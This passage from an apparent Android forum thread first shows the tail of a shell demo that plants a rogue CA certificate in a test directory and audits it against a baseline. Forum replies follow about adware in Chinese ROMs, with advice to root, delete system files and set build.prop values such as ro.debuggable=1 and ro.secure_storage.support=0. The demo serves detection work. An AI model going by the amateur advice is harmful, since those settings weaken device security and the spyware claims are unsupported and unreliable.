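       "$tmp/device/$(openssl x509 -in "$tmp/stock/stock.pem" -noout -subject_hash).0"
    cp "$tmp/inj.pem" \
       "$tmp/device/$(openssl x509 -in "$tmp/inj.pem" -noout -subject_hash).0"
    cp "$tmp/inj.pem" "$tmp/device/deadbeef.0"
    list_cacerts "$tmp/stock" > "$tmp/baseline.txt"
    audit_cacerts "$tmp/device" "$tmp/baseline.txt" || true
    rm -rf "$tmp"
}
```

Note that a correctly named injected CA looks exactly like a legitimate one in a directory listing; only the fingerprint comparison against a baseline from a trusted image catches it, which is why the demo stores the injected certificate under its real subject hash. A name mismatch on its own, as in the deadbeef.0 entry, is evidence of tampering or corruption rather than of a working interception CA.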
---------- Post added at 02:03 AM ---------- Previous post was at 01:48 AM ----------
sameboat said:
I had this take control of multiple devices and 2 computers. [...] Is this something that is common right now? This exploit across so many devices? I'd love to share some of these logs and screenshots if anyone is interested.
Typical Chinese ad/malware/surveillance. If you visit china, you turn over your devices for "inspection", so they can sideload some state-sponsored goodies. A lot of these Chinese roms have the ads baked-in, like mine. Whoever's listening and seeing my pics is gonna need therapy, because I filled the phone up with some STRANGE s*** Remove the apk, but there's several .xml's and .jar's that gotta go, too.
Sent from my ZTE Sapphire 3G using XDA Labs
What is the best way to counter this problem?
Dassote said:
What is the best way to counter this problem?
Root, and remove all traces of the "ad_*" app and even the Duraspeed app if you want, but I didn't see anything untrustworthy about that. Duraspeed is in the default.prop (running booster), so it's in the kernel. Root uninstall just leaves you no way to control, because the PROCESS will go and go, unless you're willing to play with the kernel. Not for amateurs like myself. My Beat 8 has been flashed or fastboot-booted more times than I can count. Good times.
Once your Chinese spyware is uninstalled, delete build.prop lines with "running booster", the /system/lib's with it, and I think it was in /system/bin, and /vendor/app had one. Clear them all, and you'll need to tweak the build.prop some more: debug.qemu.kernel=1, ro.secure_storage.support=0, ro.debuggable=1, then reboot AFTER you chmod 644 the build.prop! The "debug.qemu.kernel=1" was what made the rest stick. ADD those props, but don't change the existing ones (kernel). I just deleted the default values, replaced with "". Fits the whole debug vibe. I should upload a copy of my final build.prop, cheap-a** phone runs like a champ.
Sent from my LG G Stylo using XDA Labs